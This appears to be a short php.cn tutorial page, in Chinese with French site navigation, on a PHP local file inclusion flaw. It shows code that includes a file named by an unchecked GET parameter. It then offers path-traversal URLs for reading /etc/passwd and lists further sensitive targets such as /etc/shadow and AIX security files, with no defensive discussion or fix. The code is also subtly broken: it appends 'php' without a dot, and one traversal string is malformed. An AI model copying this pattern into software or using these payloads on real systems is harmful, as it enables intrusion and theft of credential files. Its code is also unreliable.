简体中文(ZH-CN) English(EN) 繁体中文(ZH-TW) 日本語(JA) 한국어(KO) Melayu(MS) Français(FR) Deutsch(DE)
Maison > développement back-end > tutoriel php > le corps du texte

php 伪造本地文件包含漏洞的代码

高洛峰
Libérer: 2023-03-01 12:56:02
original
1183 Les gens l'ont consulté

代码如下: 
$page=$_GET['page'];
include($page.'php');
?> 

你可以这样使用 
http://www.xxx.com/index.php?page=../etc/passwd 
http://www.xxx.com/index.php?page=../../../etc/passwd 
http://www.xxx.com/index.php?page=..../../etc/passwd 

获取更多数据: 
etc/profile 
etc/services 
/etc/passwd 
/etc/shadow 
/etc/group 
/etc/security/group 
/etc/security/passwd 
/etc/security/user 
/etc/security/environ 
/etc/security/limits 
/usr/lib/security/mkuser.default 

Étiquettes associées:
php
source:php.cn
Article précédent:php中使用explode查找某个字符是否存在的方法 Article suivant: 有关php运算符的知识大全
Déclaration de ce site Web
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn
Derniers articles par auteur
Derniers numéros
Comment lister les données d'une section par ID en utilisant la boucle while en PHP ? J'ai une table MySQL avec ces colonnes : series_id, series_color, product_name Dans la sor...
Depuis 2023-11-17 20:03:03
0
1
290
Appel à une fonction non définie create_function() Je reçois ce message sur la page d'accueil du site : Erreur fatale : Erreur non détectée :...
Depuis 2023-11-16 19:00:36
0
1
277
<?php // Étant donné une année, un mois et un jour, affiche le jour de l'année correspondant à la date (notez que l'année bissextile est 4 100 400) <?php // Étant donné une année, un mois et un jour, affiche le jour de l'année corre...
Depuis 2023-11-14 23:55:21
0
1
79
PHP coupe les espaces Unicode J'essaie de couper les espaces Unicode tels que ce caractère et j'ai pu le faire en utilis...
Depuis 2023-11-13 08:49:45
0
2
398
TYPO3 V11 : "Avertissement PHP : clé de tableau non définie", $this->request->getArguments() est vide Je suis un nouvel utilisateur de typo3, j'ai créé un plugin pour afficher les utilisateurs...
Depuis 2023-11-12 21:35:09
0
1
362
Rubriques connexes
Plus>
Recommandations populaires
Tutoriels populaires
Plus>
Tutoriels associés
Recommandations populaires
Derniers cours
Derniers téléchargements
Plus>
effets Web
Code source du site Web
Matériel du site Web
Modèle frontal
À propos de nous Clause de non-responsabilité Sitemap
Site Web PHP chinois:Formation PHP en ligne sur le bien-être public,Aidez les apprenants PHP à grandir rapidement!